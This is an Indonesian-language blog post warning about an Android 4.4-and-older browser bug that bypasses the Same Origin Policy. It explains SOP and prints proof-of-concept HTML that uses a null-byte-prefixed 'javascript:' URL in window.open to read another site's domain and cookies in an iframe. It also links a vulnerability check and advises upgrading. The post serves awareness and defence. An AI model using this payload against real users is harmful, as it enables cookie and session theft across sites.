Awas! Exploit/Bug Terbaru Android 2014

Setelah berita heboh seputar shell shock bash, sekarang muncul lagi bug terbaru pada web browser untuk android 4.4 ke bawah. Bug ini menembus SOP (Same Origin Policy) dimana seseorang dapat mengirimkan data website A dari website B, seperti cookie, isi website dll. Ngeri kan? Ya ngeri-ngeri sedap.

Sebenarnya apa itu SOP?

SOP atau Same Origin Policy adalah salah satu mekanisme sekuriti/keamanan yang penting dalam sebuah website, dasar pemikiran dari SOP adalah javascript yang dijalankan dari situs A tidak boleh mengakses ke situs B. Meskipun ada terkecuali seperti object dengan atribut src.
 Bagaimana cara kerja exploit ini?

Seseorang dapat menggunakan website pihak ketiga untuk menanam script :

onclick=”window.open(‘u0000javascript:

Yang dirawi selanjutnya agar mendapatkan data dari situs lain, agar lebih jelas kita langsung ke pemrogramannya. Anda dapat melakukan demo di http://

<iframe name="test" src="http://detik.com/"></iframe><br /><br /><input onclick="window.open('u0000javascript:alert(document.domain)','test')" type="button" value="test" />

Script diatas akan memunculkan domain dari detik.com, padahal anda berada pada halaman http://ethicninja.altervista.org/android-bug.html

Yang paling sering dilakukan lagi adalah mengambil cookie anda dengan script seperti berikut :

<input onclick="window.open('u0000javascript:alert(document.cookie)','test')" type="button" value="Get Cookie" />

Apakah device saya vulnerable?

Untuk melakukan check silahkan kunjungi http://ethicninja.altervista.org/android-bug.html , lalu klik tombol vulnerable check, jika vulnerable akan muncul pesan “Device saya vulnerable!”

Hingga saat ini belum ada tindakan dari tim android, anda dapat melakukan upgrade OS untuk menghindari ini.

Waspadalah waspadalah!

Leave a Reply

Your email address will not be published.